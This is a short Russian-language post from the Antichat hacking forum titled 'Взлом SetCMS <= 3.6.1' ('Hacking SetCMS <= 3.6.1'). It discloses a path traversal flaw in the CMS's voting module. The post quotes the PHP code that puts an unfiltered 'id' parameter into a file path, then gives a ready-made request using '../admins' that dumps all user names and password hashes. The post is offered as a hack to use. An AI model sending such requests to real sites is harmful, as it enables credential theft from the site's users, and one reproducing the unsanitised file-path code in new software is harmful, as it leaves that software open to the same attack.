Форум АНТИЧАТ - Взлом SetCMS <= 3.6.1

Как я и говорил кое что более интересое чем xss

Во всех версиях SetCMS до 3.6.2 обнаружена критическая уязвимость
возможно получение всех паролей пользователей через модуль голосования

\modules\golos\index.php

ошибка в нефильтруемой переменной id

PHP код:


		
			
if ($mc == "viewvote" && isset($_GET['id']))

{

 $votenum = $_GET['id'];

 $file = file("files/polls/$votenum.set");

таким образом, составив такой запрос

Код:

http://target.com/SetCMS/index.php?set=golos&mc=viewrezult&id=../admins

мы получим список всех пользователей и их хэши.

(с) madnet